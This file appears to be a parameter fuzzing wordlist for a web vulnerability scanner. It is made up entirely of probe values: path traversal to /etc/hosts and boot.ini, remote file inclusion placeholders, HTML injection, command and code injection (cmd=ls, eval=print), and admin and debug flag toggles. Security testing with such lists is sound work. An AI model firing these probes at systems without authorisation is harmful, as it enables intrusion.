admin=1
admin=true
admin=yes
c_path=../../../../../../../../../../boot.ini?
c_path=../../../../../../../../../../etc/hosts?
catch
cmd=ls
content
data
debug=1
debug=true
debug=yes
dir=..
directory=..
download=##RFI##
download=1
download=true
download=yes
err=<h1>test</h1>
errmsg=<h1>test</h1>
error=<h1>test</h1>
errormsg=<h1>test</h1>
exec=dir
exec=ls
f=../../../../../../../../../../boot.ini?
f=../../../../../../../../../../etc/hosts?
f=##RFI##
file=../../../../../../../../../../boot.ini?
file=../../../../../../../../../../etc/hosts?
file=##RFI##
files=.
fire=1
fire=true
fire=yes
preload=##RFI##
go=##RFI##
go=../../../../../../../../../../boot.ini?
go=../../../../../../../../../../etc/hosts?
goto=##RFI##
id=1
include=../../../../../../../../../../boot.ini?
include=../../../../../../../../../../etc/hosts?
include=##RFI##
inf=##RFI##
lang=../../../../../../../../../../boot.ini?
lang=../../../../../../../../../../etc/hosts?
layout=../../../../../../../../../../etc/hosts?
layout=../../../../../../../../../../boot.ini?
lib=../../../../../../../../../../etc/hosts?
lib=../../../../../../../../../../boot.ini?
load=1
load=yes
load=si
load=true
eval=print("CODEINJECTION")
load=##RFI##
loc=##RFI##
loc=../../../../../../../../../../etc/hosts?
log=../../../../../../../../../../boot.ini?
log=1
log=yes
log=true
log=si
local=.
host=##RFI##
locale=../../../../../../../../../../etc/hosts?
locale=../../../../../../../../../../boot.ini?
locate=
message=<h1>test</h1>
mode=a
move=.
msg==<h1>test</h1>
mv=.
naam=##RFI##
name=<h1>test</h1>
nom=<h1>test</h1>
nombre=<h1>test</h1>
num=1
p=1
path=../../../../../../../../../../boot.ini?
path=../../../../../../../../../../etc/hosts?
pg=1
place=1
read=../../../../../../../../../../etc/hosts?
read=../../../../../../../../../../boot.ini?
fread=../../../../../../../../../../etc/hosts?
fread=../../../../../../../../../../boot.ini?
open=../../../../../../../../../../etc/hosts?
open=../../../../../../../../../../boot.ini?
fopen=../../../../../../../../../../etc/hosts?
fopen=../../../../../../../../../../boot.ini?
readir=.
readdir=.
reset=1
reset=true
reset=yes
install=1
install=true
install=yes
root=../../../../../../../../../../boot.ini?
root=../../../../../../../../../../etc/hosts?
root_path=../../../../../../../../../../boot.ini?
root_path=../../../../../../../../../../etc/hosts?
run=1
run=true
run=yes
sel=1
session=##RFI##
session=../../../../../../../../../../boot.ini?
session=../../../../../../../../../../etc/hosts?
set=1
up=1
upload=.
upload=true
upload=yes
upload=../../../../../../../../../../etc/hosts?
upload=../../../../../../../../../../boot.ini?
